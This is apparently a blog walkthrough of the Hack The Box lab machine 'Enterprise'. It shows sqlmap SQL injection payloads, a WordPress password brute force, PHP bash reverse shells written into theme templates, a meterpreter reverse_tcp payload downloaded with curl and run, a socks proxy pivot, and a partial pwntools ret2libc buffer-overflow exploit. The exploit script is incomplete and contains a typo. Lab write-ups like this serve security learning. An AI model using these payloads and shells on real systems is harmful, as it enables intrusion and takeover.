Enterprise Writeup Hackthebox

Enterprise Writeup / Walkthrough Hack the box

Enterprise Writeup SE

Enterprise writeup htb
Enterprise Write up Hack the box


This Writeup is about Enterprise, on hack the box. It was a Linux box. It starts off with a SQLInjection for an initial foothold. We dump a database find passwords login to WordPress and get a shell. There we find we are in a docker network. So we port forward a host and get connected to database dump usernames in Joomla database. We use passwords found earlier to login and get a shell on this server there we get access to /files folder which is mounted from the host so we host a reverse shell. There and get a shell on the host from there we find out a SUID vulnerable to buffer Overflow so we exploit it and get root. That is it for Enterprise Writeup.


Scanning Network

I did an initial Nmap scan and there was a lot of output. From there we found that port 22, 80, 443 & 8080 were open. So I started enumeration and found that port 80 had WordPress. Port 443 an apache server & port 8080 had a Joomla instance running so I started enumeration.

Nmap 7.80 scan initiated Tue Apr  7 22:09:13 2020 as: nmap -sC -sV -oA nmap/
Nmap scan report for
Host is up (0.32s latency).
Not shown: 996 closed ports
22/tcp   open  ssh      OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:e9:8c:c5:b5:52:23:f4:b8:ce:d1:96:4a:c0:fa:ac (RSA)
|   256 f3:9a:85:58:aa:d9:81:38:2d:ea:15:18:f7:8e:dd:42 (ECDSA)
|_  256 de:bf:11:6d:c0:27:e3:fc:1b:34:c0:4f:4f:6c:76:8b (ED25519)
80/tcp   open  http     Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.1
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: USS Enterprise – Ships Log
443/tcp  open  ssl/http Apache httpd 2.4.25 ((Ubuntu))
|_http-server-header: Apache/2.4.25 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=enterprise.local/organizationName=USS Enterprise/stateOrProvinceName=United Federation of Planets/countryName=UK
| Not valid before: 2017-08-25T10:35:14
|_Not valid after:  2017-09-24T10:35:14
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
8080/tcp open  http     Apache httpd 2.4.10 ((Debian))
|_http-generator: Joomla! - Open Source Content Management
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration and Reconnaissance.

This machine had a lot to enumerate. So I used Wpscan for WordPress from this we find that there are no useful vulnerabilities. Just a couple of XSS and CSRF to get an initial foothold. We need an RCE or something similar to let us in so I ignored it and moved ahead.

wpscan --url http://enterprise.local -e vp vt cb u m --api-token 9USW6KxqY91d7DXaNtDxawBRFqepm1pO1xKyNUsNa8gs | tee wpscan.log
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.8
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

[+] URL: http://enterprise.local/
[+] Started: Thu Apr  9 08:45:32 2020

Interesting Finding(s):

[+] http://enterprise.local/
 | Interesting Entries:
 |  - Server: Apache/2.4.10 (Debian)
 |  - X-Powered-By: PHP/5.6.31
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
[+] http://enterprise.local/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
[+] http://enterprise.local/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

This is just to show what options I used. There were a lot of vulnerabilities but they weren’t useful you can see the whole dump on paste bin.

Also, I found a user named William.riker and username convention they are using by going through there posts on WordPress.

Moving on I started gobuster on port 443 and found files directory. I manually searched and found a username in SSL certificate. In which I found an email address so I saved it in case we find passwords. We can try to ssh in with this username.

[email protected]:~ gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -t 50 -o root.gobust -k
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        50
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/04/09 09:14:01 Starting gobuster
/files (Status: 301)

I used a -k option to ignore certificate checks by gobuster or it’ll fail to brute force the directories. We found out that domain is enterprise.local and email is [email protected] this information was in SSL certificate. To check it you need to go to I have made an entry in my host file for enterprise.local and enterprise.htb to point to IP. You can do it too by this one-liner.

echo "  enterprise.local enterprise.htb" > /etc/hosts

Moving on to Joomla for enumeration, I used a tool called Joomlavs. I Found a SQL Injection. For now, I left it alone for a while you can see the whole dump on Pastebin.

Enterprise Writeup: Source Code Review on lcars.zip

I went back and browsed to https://enterpise.local/files directory that we found earlier when we were gobusting port 443.

I found a zip file called lcars.zip I unzipped it. It looked like a WordPress plugin. This zip file had two files PHP files both are taking input from the “Query” parameter. And passing it to a SQL Query to the database without sanitization. Although one of these looked like broken PHP code lcars_db.php was just a rabbit hole. Another file lcars_dbpost.php was doing the same but it was only allowing numbers in user input.

Enterprise writeup htb
Only Int are getting passed to sql query

So i went on WordPress and tried the URL http://enterprise.htb/wp-content/plugins/lcars/lcars_db.php?query=1 and it worked that means that our WordPress is vulnerable to SQL injection and lcars.zip is on this instance.

Enterprise writeup htb
Sql injection detected

So i used SQLMap to exploit this first i open burp and captured this request. I saved it in a file by right click > copy to file in burp.

copy to file
Save to file burp

I tried SQLMap with couple of other settings but this one worked the best for me.

[email protected]: sqlmap -r lcarss.req -p query --dbms mysql --risk 1 --level 1                                 
 ___ ___[)]_____ ___ ___  {}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:07:42 /2020-04-09/

[10:07:42] [INFO] parsing HTTP request from 'lcarss.req'
[10:07:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: query (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: query=(SELECT (CASE WHEN (2853=2853) THEN 1 ELSE (SELECT 1307 UNION SELECT 2863) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: query=1 AND (SELECT 4231 FROM(SELECT COUNT(*),CONCAT(0x716b626271,(SELECT (ELT(4231=4231,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: query=1 AND (SELECT 5529 FROM (SELECT(SLEEP(5)))oQkF)
[10:07:47] [INFO] testing MySQL
[10:07:47] [INFO] confirming MySQL
[10:07:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: PHP 5.6.31, Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[10:07:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/enterprise.htb'

[*] ending @ 10:07:47 /2020-04-09/

after this, I used SQLMaps –dump parameter to dump the database. Found posts in WordPress posts that had passwords in them another had to store passwords quickly. So he left them there.

passwords enterprise
SQLMap dump Passwords in post

I saved these passwords in a file called passwords. Used wpscan to bruteforce WordPress. See if any of these passwords belong to William.riker the user we found earlier. And found a valid pair.

 wpscan --url http://enterprise.local --usernames william.riker --passwords /root/Desktop/HackTheBox-Machines/Enterprise/passwords 
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

[+] URL: http://enterprise.local/
[+] Started: Thu Apr  9 10:22:11 2020

Interesting Finding(s):

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - william.riker / u*Z14ru0p#ttj83zS6                                                                                                                                                  
Trying william.riker / nZD3YxfnSjezg67JZ Time: 00:00:00 <=================================> (5 / 5) 100.00% Time: 00:00:00

[i] Valid Combinations Found:
 | Username: william.riker, Password: u*Z14ru0p#ttj83zS6

[+] Finished: Thu Apr  9 10:22:29 2020
[+] Requests Done: 51
[+] Cached Requests: 4
[+] Data Sent: 13.956 KB
[+] Data Received: 138.54 KB
[+] Memory used: 156.952 MB
[+] Elapsed time: 00:00:17

Enterprise Writeup: Initial Foothold

Now I logged in WordPress as William.riker and I found that I could edit theme so I added my malicious PHP code to get a shell in header.php file. Since it is a challenge it doesn’t matter but if it were a real pentest putting it on header ill give you a shell but it’ll hang the webserver this can raise suspicion avoid doing this in a real-world scenario.

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");?>
initial foothold enterprise
Getting a shell

And we got a shell. I did if config and it was not found so i tried ip addr and found that this machine had different ip address that which we were attacking this made me think that it might be container i tried ip neighbors to see if there is around but it was not in our network.

Initial foothold enterprise
Different IP

On checking our network neighbors. I saw this IP address as is probably the gateway is another host. So I checked /etc/hosts file for a clue on what it might be and we find out that it is a Mysql server.

[email protected]:/var/www/html$ cat /etc/hosts
cat /etc/hosts localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters mysql 15af95635b7d b8319d86d21e

It also suggests that these hostnames are generated which may be an indication that this is a docker container.

As we got a shell through WordPress I wanted to check what is there in wp-config.php to get database password in it. I got MySQL root password in wp-config.php.

Root password of database in wp-config.php

Because we couldn’t get a good pty shell as there was no python on this box Ill upgrade our shell to a meterpreter shell.

[email protected]:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT=8001 -f elf -o msf.bin 

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: msf.bin
[email protected]: python -m SimpleHTTPServer -p 80

Hosted this file on python server in my machine. then I used curl to download meterpreter payload on our target & execute it.

Upgrading to Meterpreter Shell

Enterprise Writeup: Pivoting to access database on

Now that we have a meterpreter shell ill try to port forward MySQL port so that we can access it on localhost and see what’s in the database we could have just done –dump-all option of SQLMap but I want to show pivoting.

Ill use meterpreter to start a socks4 server so that we can talk to

Step 1: Background Meterpreter session by background command and use sock4 auxiliary to start a server note that its listening on port 1080 so you have to set up the same port number in your /etc/proxychains.conf.

meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > show options
Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

Auxiliary action:

   Name   Description
   ----   -----------

msf5 auxiliary(server/socks4a) > route add 4
[*] Route added
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/socks4a) > 
[*] Starting the socks4a proxy server

Check Proxychains have setup on port 1080.

[email protected]: tail /etc/proxychains.conf
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 1080

On last line of proxychains conf, you can see socks4 host and port is localhost and port 1080. If yours don’t match change it to the same. Using vim /etc/proxychains.conf goto last line and change the port to 1080.

Now ill open another terminal on my kali and use proxychains to navigate to that host and connect to MYSQL. Use the password we found in wp-config.php and we are in the database.

[email protected]: proxychains mysql -u root -p -h            
ProxyChains-3.1 (http://proxychains.sf.net)
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 55
Server version: 5.7.19 MySQL Community Server (GPL)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> 

In this database I found joomladb and in Joomla, i found two more usernames. I have not shown how I selected the table and fields but check out this Pastebin dump. If you wanna know how I got to know table names and databases. also, check out this cheatsheet.

Joomladb password hash’s

Instead of cracking these hash’s I instead tried the passwords we found earlier in WordPress DB. And geordi.la.forge:ZD3YxfnSjezg67JZ credential pair worked for SuperUser account.

Enterprise Writeup: Joomla To Shell

I’ll edit the template on joomla to get a shell-like we did on WordPress. Well, use the same payload and edit index.php file in this template. You can find templates under “Extensions > Templates > Templates > Protostar Details and Files”.

exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");

And we get a shell on port 9002 when loading our joomla home page. But after there is nothing special about it. Except that joomla have a files directory which had lcars.zip. I also checked mount points and found. That there is some weird mounting points that points to /var/www/html on both joomla & wordpress.

[email protected]:/var/www/html$ mount

# these are the weird mounting points 

/dev/mapper/enterprise--vg-root on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /var/www/html type ext4 (rw,relatime,errors=remount-ro,data=ordered)\

# this is where it is pointing to /var/www/html/files 

/dev/mapper/enterprise--vg-root on /var/www/html/files type ext4 (rw,relatime,errors=remount-ro,data=ordered)

[email protected]:/var/www/html$ 

PS:- I have removed the rest of the mount points. Now I’ll host another PHP file in files directory and see if we get to the host. Ill use the Pentester monkeys PHP reverse shell-like earlier host it on my machine and curl it on server

[email protected]:/var/www/html/files$ curl -o shell.php

we navigate on our browser to shell.php And we got a shell from host.

Shell from enterprise.htb

After a lot of work we got user on this box.


Enterprise Writeup: RE

After running linenum on the host machine. I found lcars SUID file it looked like a possible way to escalate our privileges on this box. So I base64ed it and copied the file to my kali. If you don’t know about this method of coping files than look at my postman writeup where I copied ssh key using this technique.

It Asks for the key when we try to run it. so i did ltrace on this binary and there is a strcmp that compares string you give with picarda1. So i tried this key and we got to the menu after that I tried to give every option of the menu 500 “A”‘s as input to check for buffer overflow and 4th option is vulnerable to buffer overflow.

Buffer Overflow Detected

Now that I knew that there is a buffer Overflow in this program I created a pattern with pattern create and pattern offset. To find out exactly where we are overwriting EIP.

gef➤  pattern create 500
[+] Generating a pattern of 500 bytes
[+] Saved as '$_gef1'
gef➤  r
Starting program: /root/Desktop/HackTheBox-Machines/Enterprise/lcars 

                 _______ _______  ______ _______
          |      |       |_____| |_____/ |______
          |_____ |_____  |     | |    \_ ______|

Welcome to the Library Computer Access and Retrieval System

Enter Bridge Access Code: 

                 _______ _______  ______ _______
          |      |       |_____| |_____/ |______
          |_____ |_____  |     | |    \_ ______|

Welcome to the Library Computer Access and Retrieval System

LCARS Bridge Secondary Controls -- Main Menu: 

1. Navigation
2. Ships Log
3. Science
4. Security
5. StellaCartography
6. Engineering
7. Exit
Waiting for input: 
Disable Security Force Fields
Enter Security Override:

Program received signal SIGSEGV, Segmentation fault.
0x63616164 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax   : 0x216     
$ebx   : 0x63616162 ("baac"?)
$ecx   : 0x7ffffde9
$edx   : 0xf7fb5010  →  0x00000000
$esp   : 0xffffd0b0  →  "eaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqa[...]"
$ebp   : 0x63616163 ("caac"?)
$esi   : 0xf7fb3000  →  0x001d6d6c ("lm"?)
$edi   : 0xf7fb3000  →  0x001d6d6c ("lm"?)
$eip   : 0x63616164 ("daac"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063 
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd0b0│+0x0000: "eaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqa[...]"	 ← $esp
0xffffd0b4│+0x0004: "faacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacra[...]"
0xffffd0b8│+0x0008: "gaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsa[...]"
0xffffd0bc│+0x000c: "haaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaacta[...]"
0xffffd0c0│+0x0010: "iaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacua[...]"
0xffffd0c4│+0x0014: "jaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacva[...]"
0xffffd0c8│+0x0018: "kaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwa[...]"
0xffffd0cc│+0x001c: "laacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxa[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x63616164
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "lcars", stopped, reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
gef➤  pattern search 0x63616164
[+] Searching '0x63616164'
[+] Found at offset 212 (little-endian search) likely
[+] Found at offset 308 (big-endian search) 

We found the offset. Now we need to check if there are any protections on the binary itself like DEP or ASLR. So i did a checksec and it showed me no protection . I went to remote machine and tested if ASLR is Disabled.

$ cat /proc/sys/kernel/randomize_va_space
$ ldd /bin/lcars | grep libc
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7e32000)
$ ldd /bin/lcars | grep libc
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7e32000)

These two checks confirmed that ASLR or DEP is not enabled as no random libc address is shown and randomize_va_space is zero. Now ill write a python exploit to use buffer overflow and get root on the box.

(gdb) r
Starting program: /bin/lcars 

                 _______ _______  ______ _______
          |      |       |_____| |_____/ |______
          |_____ |_____  |     | |    \_ ______|

Welcome to the Library Computer Access and Retrieval System

Enter Bridge Access Code: 
Program received signal SIGTSTP, Stopped (user).
0xf7fd7c89 in __kernel_vsyscall ()
no debug info>} 0xf7e3faf0 <exit>
# Getting system address
(gdb) p system
$7 = {<text variable, no debug info>} 0xf7e4c060 <system>
# Getting Exit address
(gdb) p exit
$8 = {<text variable, no debug info>} 0xf7e3faf0 <exit>
# Getting bin/sh address
(gdb) find &system,+9999999,"sh"
4 patterns found.
# Verifying address of /bin/sh
(gdb) x/s 0xf7f6ddd5
0xf7f6ddd5:	"sh"

Above is how i got all the memory addresses from the gdb on target system.

Enterprise Writeup: Python Exploit & Root

from pwn import *

context(os="linux", arch="i386")
HOST, PORT = "", 32812

#EIP OverWrite @ 212

junk = "\x90" * 212

ret2libc = p32(0xf7e4c060) # System()
ret2libc += p32(0xf7e3faf0) # Exit()
ret2libc += p32(0xf7f6ddd5) # sh

payload = junk + ret2libc
r = remote(HOST,PORT)
r.recvuntil("Enter Bridge Access Code:")
r.recvuntil("Waiting for input:")
r.recuntil("Enter Security Override:")

And now the moment of truth we’ll run this exploit and hope everything is gone be fine and we will get root.

Got root

Huh.. this was an Enterprise Writeup long one i hope you enjoyed this box as much as I did. I would love to see your comments. If you have any questions. Feel free to respect my account on hackthebox. If you feel like it this is my account. https://www.hackthebox.eu/home/users/profile/157669.

Posts created 8

One thought on “Enterprise Writeup / Walkthrough Hack the box

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search term above and press enter to search. Press ESC to cancel.

Back To Top